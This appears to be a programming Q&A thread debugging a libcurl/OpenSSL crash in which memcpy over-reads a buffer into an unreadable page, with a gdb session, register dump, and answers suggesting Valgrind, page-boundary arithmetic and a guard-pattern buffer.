0x7ffff6a2ea76 <memcpy+278>: mov %r10,0x18(%rdi)
0x7ffff6a2ea7a <memcpy+282>: lea 0x20(%rsi),%rsi
0x7ffff6a2ea7e <memcpy+286>: lea 0x20(%rdi),%rdi
0x7ffff6a2ea82 <memcpy+290>: jne 0x7ffff6a2ea30 <memcpy+208>
0x7ffff6a2ea84 <memcpy+292>: data32 data32 nopw %cs:0x0(%rax,%rax,1)
0x7ffff6a2ea90 <memcpy+304>: and $0x1f,%edx
0x7ffff6a2ea93 <memcpy+307>: mov -0x8(%rsp),%rax
0x7ffff6a2ea98 <memcpy+312>: jne 0x7ffff6a2e969 <memcpy+9>
0x7ffff6a2ea9e <memcpy+318>: repz retq
(gdb) info registers
rax 0x0 0
rbx 0x7fffe77f50b0 140737077268656
rcx 0x1 1
rdx 0xff 255
rsi 0x7fffe3e1f000 140737016623104
rdi 0x7fffe77f4f60 140737077268320
rbp 0x7fffe77f4e90 0x7fffe77f4e90
rsp 0x7fffe77f4e48 0x7fffe77f4e48
r8 0x11 17
r9 0x10 16
r10 0x1 1
r11 0x7ffff6a28f7a 140737331236730
r12 0x7fffe3dde490 140737016358032
r13 0x7ffff5bc2a0c 140737316137484
r14 0x7fffe3d69b50 140737015880528
r15 0x0 0
rip 0x7ffff6a2ea5c 0x7ffff6a2ea5c <memcpy+252>
eflags 0x10203 [ CF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) p/x $rsi
$50 = 0x7fffe3e1f000
(gdb) x/20x $rsi
0x7fffe3e1f000: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f010: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f020: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f030: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f040: 0x00000000 0x00000000 0x00000000 0x00000000
I'm using libcurl version 7.21.6, c-ares version 1.7.4, and openssl version 1.0.0d. My program is multithreaded, but I have registered mutex callbacks with openssl. The program is running on Ubuntu 11.04 desktop, 64-bit. libc is 2.13.
Clearly libcurl is over-reading the source buffer, and stepping into unreadable memory (page at 0x7fffe3e1f000 -- you can confirm that memory is unreadable by looking at /proc/<pid>/maps for the program being debugged).
Here's where it starts to get weird. I can manually inspect all 256 bytes of both
buf and biomem->data without gdb complaining that the memory isn't accessible.
There is a well-known Linux kernel flaw: even for memory that has PROT_NONE (and causes SIGSEGV on an attempt to read it from the process itself), an attempt by GDB to ptrace(PTRACE_PEEKDATA, ...) succeeds. That explains why you can examine 256 bytes of the source buffer in GDB, even though only 160 of them are actually accessible (the buffer starts at 0x7fffe3e1ef60 and the unreadable page begins at 0x7fffe3e1f000).
Try running your program under Valgrind; chances are it will tell you that you are memcpying from a heap-allocated buffer that is too small.
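The 160-byte limit seen in the question falls out of the distance from biomem->data to the next page boundary. A small sketch of that arithmetic, assuming 4096-byte pages (the usual size on x86-64 Linux, but an assumption here); bytes_until_page_end is a made-up helper name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Number of bytes from addr up to (not including) the start of the
 * next page. page_size must be a power of two.
 */
size_t bytes_until_page_end(uint64_t addr, uint64_t page_size)
{
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
    return (size_t)(page_size - (addr & (page_size - 1)));
}
```

For biomem->data at 0x7fffe3e1ef60 this gives 160, which matches both the faulting address 0x7fffe3e1f000 in %rsi and the observation that a manual memcpy of up to 160 bytes works.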
Do you have any possibility of creating a "crumple zone"?
That is, deliberately increasing the size of the two buffers, or in the case of the structure putting an extra unused element after the destination?
You then seed the source crumple zone with something such as "0xDEADBEEF", and the destination with something nice. If the destination ever changes, you've got something to work with.
256 is a bit suggestive. Is there any possibility it could somehow be treated as a signed quantity, becoming -1, and hence very big? I can't see how gdb wouldn't show it, but ...
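The crumple-zone idea could look roughly like the sketch below. It guards a destination buffer only, and the struct layout, guard size and function names are all assumptions made for illustration, not anything taken from libcurl.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define GUARD_PATTERN 0xDEADBEEFu
#define GUARD_WORDS   8

/* A 256-byte buffer followed directly by a seeded guard area. */
struct guarded_buf {
    char     buf[256];
    uint32_t guard[GUARD_WORDS];
};

/* Clear the buffer and fill the guard area with the known pattern. */
void guard_init(struct guarded_buf *g)
{
    memset(g->buf, 0, sizeof g->buf);
    for (size_t i = 0; i < GUARD_WORDS; i++)
        g->guard[i] = GUARD_PATTERN;
}

/* Return 1 if the guard area still holds the pattern, 0 otherwise. */
int guard_intact(const struct guarded_buf *g)
{
    for (size_t i = 0; i < GUARD_WORDS; i++)
        if (g->guard[i] != GUARD_PATTERN)
            return 0;
    return 1;
}
```

Checking guard_intact() after each suspicious copy (or putting a gdb watchpoint on the guard words) narrows down which write runs past the end of the buffer.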